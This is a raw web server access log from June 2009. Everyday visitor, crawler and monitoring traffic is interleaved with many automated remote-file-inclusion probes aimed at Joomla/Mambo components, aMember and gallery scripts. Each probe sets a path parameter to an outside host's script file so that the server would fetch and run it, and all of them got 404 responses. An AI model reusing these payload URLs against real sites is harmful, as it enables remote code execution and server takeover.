217.147.29.190 - - [24/Jun/2009:08:02:00 -0400] "GET /logs/access_log.Q109061400%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:08:02:01 -0400] "GET /logs/error_log.Q109060400/?DOCUMENT_ROOT=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 224 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
217.147.29.190 - - [24/Jun/2009:08:02:03 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.17.99.13 - - [24/Jun/2009:08:02:04 -0400] "GET /logs/access_log.Q109061800//index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:02:04 -0400] "GET //index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:02:04 -0400] "GET /logs//index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.826"
217.147.29.190 - - [24/Jun/2009:08:02:08 -0400] "GET /logs/access_log.Q109061200%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:08:02:25 -0400] "GET /logs/error_log.Q109060400/?DOCUMENT_ROOT=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
216.17.99.13 - - [24/Jun/2009:08:02:38 -0400] "GET /logs/access_log.Q109061800//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:02:39 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:02:39 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:02:40 -0400] "GET /logs/access_log.Q109061500//index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:02:42 -0400] "GET /logs/access_log.Q109061800//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:02:42 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:02:42 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:02:42 -0400] "GET /logs/access_log.Q109061500//index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
200.161.199.102 - - [24/Jun/2009:08:02:44 -0400] "GET /logs/access_log.Q109052700//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
216.17.99.13 - - [24/Jun/2009:08:02:44 -0400] "GET /logs/access_log.Q109061500//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.17.99.13 - - [24/Jun/2009:08:02:44 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.17.99.13 - - [24/Jun/2009:08:02:46 -0400] "GET /logs/access_log.Q109061500//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.17.99.13 - - [24/Jun/2009:08:02:46 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.17.99.13 - - [24/Jun/2009:08:02:47 -0400] "GET /logs/access_log.Q109061500//index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:02:48 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:02:48 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:02:50 -0400] "GET //index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:02:56 -0400] "GET //index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:02:58 -0400] "GET //index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:03:02 -0400] "GET /logs/access_log.Q109061800//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:03:03 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:03:03 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:03:16 -0400] "GET /logs/access_log.Q109061500//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:03:19 -0400] "GET /logs/access_log.Q109061500//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.826"
210.4.77.148 - - [24/Jun/2009:08:03:21 -0400] "GET /logs/access_log.Q109051900//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
38.99.44.103 - - [24/Jun/2009:08:03:29 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):02 HTTP/1.0" 200 52086 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.17.99.13 - - [24/Jun/2009:08:03:33 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:03:36 -0400] "GET /logs/access_log.Q109061500//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.826"
209.59.12.99 - - [24/Jun/2009:08:03:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.200.195.130 - - [24/Jun/2009:08:03:54 -0400] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.200.195.130 - - [24/Jun/2009:08:03:58 -0400] "GET /logs/access_log.Q109050800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.atu.bz/ID1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
216.17.99.13 - - [24/Jun/2009:08:04:11 -0400] "GET /logs/access_log.Q109061500//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.17.99.13 - - [24/Jun/2009:08:04:11 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
172.16.1.176 - - [24/Jun/2009:08:04:12 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [24/Jun/2009:08:04:12 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [24/Jun/2009:08:04:12 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
76.4.66.199 - - [24/Jun/2009:08:04:19 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"
76.4.66.199 - - [24/Jun/2009:08:04:19 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"
76.4.66.199 - - [24/Jun/2009:08:04:20 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"
76.4.66.199 - - [24/Jun/2009:08:04:20 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"
123.242.165.138 - - [24/Jun/2009:08:04:26 -0400] "GET /logs/access_log.Q109060100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
123.242.165.138 - - [24/Jun/2009:08:04:32 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
123.242.165.138 - - [24/Jun/2009:08:04:33 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/ro/includes/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
217.147.29.190 - - [24/Jun/2009:08:04:33 -0400] "GET /logs/access_log.Q109061400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [24/Jun/2009:08:04:33 -0400] "GET /logs/access_log.Q109061200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
155.212.232.66 - - [24/Jun/2009:08:04:38 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:08:04:38 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:08:04:38 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:08:04:38 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
213.149.105.23 - - [24/Jun/2009:08:04:43 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
213.149.105.23 - - [24/Jun/2009:08:04:43 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
213.149.105.23 - - [24/Jun/2009:08:04:43 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
172.16.1.78 - - [24/Jun/2009:08:05:41 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.78 - - [24/Jun/2009:08:05:41 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.78 - - [24/Jun/2009:08:05:41 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
91.121.156.60 - - [24/Jun/2009:08:05:47 -0400] "GET /logs/access_log.Q109052300/modules/mod_mainmenu.php?mosConfig_absolute_path=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
91.121.156.60 - - [24/Jun/2009:08:05:47 -0400] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 222 "-" "libwww-perl/5.826"
91.121.156.60 - - [24/Jun/2009:08:05:47 -0400] "GET /logs/modules/mod_mainmenu.php?mosConfig_absolute_path=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.826"
216.139.67.116 - - [24/Jun/2009:08:06:09 -0400] "GET /logs/access_log.Q109060400%20%20/?DOCUMENT_ROOT=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
207.210.111.216 - - [24/Jun/2009:08:06:15 -0400] "GET /logs/error_log.Q109060500//aMember/plugins/payment/cdg/cdg.inc.php?config[root_dir]=http://www.wstardesigns.com/xcart/templates_c/id.txt? HTTP/1.1" 404 264 "-" "libwww-perl/5.810"
207.210.111.216 - - [24/Jun/2009:08:06:16 -0400] "GET //aMember/plugins/payment/cdg/cdg.inc.php?config[root_dir]=http://www.wstardesigns.com/xcart/templates_c/id.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.810"
207.210.111.216 - - [24/Jun/2009:08:06:16 -0400] "GET /logs//aMember/plugins/payment/cdg/cdg.inc.php?config[root_dir]=http://www.wstardesigns.com/xcart/templates_c/id.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
207.210.111.216 - - [24/Jun/2009:08:06:35 -0400] "GET /logs/access_log.Q109051300//aMember/plugins/payment/cdg/cdg.inc.php?config[root_dir]=http://www.wstardesigns.com/xcart/templates_c/id.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.810"
91.121.156.60 - - [24/Jun/2009:08:06:36 -0400] "GET /logs/error_log.Q109050600/modules/mod_mainmenu.php?mosConfig_absolute_path=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 248 "-" "libwww-perl/5.826"
91.121.156.60 - - [24/Jun/2009:08:07:02 -0400] "GET /logs/error_log.Q109050600%20/modules/mod_mainmenu.php?mosConfig_absolute_path=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
172.16.1.176 - - [24/Jun/2009:08:07:56 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [24/Jun/2009:08:07:56 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [24/Jun/2009:08:07:56 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
155.212.232.66 - - [24/Jun/2009:08:08:20 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
155.212.232.66 - - [24/Jun/2009:08:08:20 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
155.212.232.66 - - [24/Jun/2009:08:08:22 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
83.16.182.130 - - [24/Jun/2009:08:08:49 -0400] "GET /logs/access_log.Q109060800%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
172.16.1.78 - - [24/Jun/2009:08:09:05 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.78 - - [24/Jun/2009:08:09:05 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.78 - - [24/Jun/2009:08:09:05 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
83.16.182.130 - - [24/Jun/2009:08:09:06 -0400] "GET /logs/access_log.Q109051900%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
172.16.1.87 - - [24/Jun/2009:08:09:34 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [24/Jun/2009:08:09:34 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.87 - - [24/Jun/2009:08:09:34 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
66.249.71.49 - - [24/Jun/2009:08:09:56 -0400] "GET /images/over-index4_impltpcsstr.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
66.249.71.57 - - [24/Jun/2009:08:09:57 -0400] "GET /images/over-store_anesth_section.jpg HTTP/1.1" 200 9173 "-" "Googlebot-Image/1.0"
172.16.1.98 - - [24/Jun/2009:08:10:22 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.98 - - [24/Jun/2009:08:10:22 -0400] "PROPFIND /excel HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.98 - - [24/Jun/2009:08:10:22 -0400] "PROPFIND /excel HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
200.161.199.102 - - [24/Jun/2009:08:11:04 -0400] "GET /logs/access_log.Q109050800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
200.161.199.102 - - [24/Jun/2009:08:11:06 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
200.161.199.102 - - [24/Jun/2009:08:11:11 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
213.149.105.23 - - [24/Jun/2009:08:11:15 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
172.16.1.176 - - [24/Jun/2009:08:11:21 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [24/Jun/2009:08:11:21 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [24/Jun/2009:08:11:21 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [24/Jun/2009:08:11:27 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [24/Jun/2009:08:11:27 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [24/Jun/2009:08:11:27 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
213.149.105.23 - - [24/Jun/2009:08:11:47 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
213.149.105.23 - - [24/Jun/2009:08:11:47 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
213.149.105.23 - - [24/Jun/2009:08:11:47 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
209.59.12.99 - - [24/Jun/2009:08:12:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.139.129 - - [24/Jun/2009:08:12:06 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.139.129 - - [24/Jun/2009:08:12:06 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
124.0.139.129 - - [24/Jun/2009:08:12:06 -0400] "GET /logs/access_log.Q109060300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.0.139.129 - - [24/Jun/2009:08:12:06 -0400] "GET /logs/access_log.Q109052500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
172.16.1.176 - - [24/Jun/2009:08:12:36 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [24/Jun/2009:08:12:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [24/Jun/2009:08:12:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
207.210.111.216 - - [24/Jun/2009:08:13:00 -0400] "GET //aMember/plugins/payment/paymentsgateway/paymentsgateway.inc.php?config[root_dir]=http://www.wstardesigns.com/xcart/templates_c/id.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.810"
66.180.169.16 - - [24/Jun/2009:08:13:04 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://swoooper.com//config/b1tchXs4f3.txt???? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
200.161.199.102 - - [24/Jun/2009:08:13:13 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
200.161.199.102 - - [24/Jun/2009:08:13:16 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
216.17.99.13 - - [24/Jun/2009:08:13:18 -0400] "GET //common/song.php?commonpath=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:13:18 -0400] "GET //common/song.php?commonpath=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.826"
66.180.169.16 - - [24/Jun/2009:08:13:19 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://swoooper.com//config/b1tchXs4f3.txt???? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
216.17.99.13 - - [24/Jun/2009:08:13:19 -0400] "GET //common/song.php?commonpath=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.826"
66.180.169.16 - - [24/Jun/2009:08:13:20 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://swoooper.com//config/b1tchXs4f3.txt???? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
200.161.199.102 - - [24/Jun/2009:08:13:23 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
172.16.1.79 - - [24/Jun/2009:08:13:23 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [24/Jun/2009:08:13:23 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
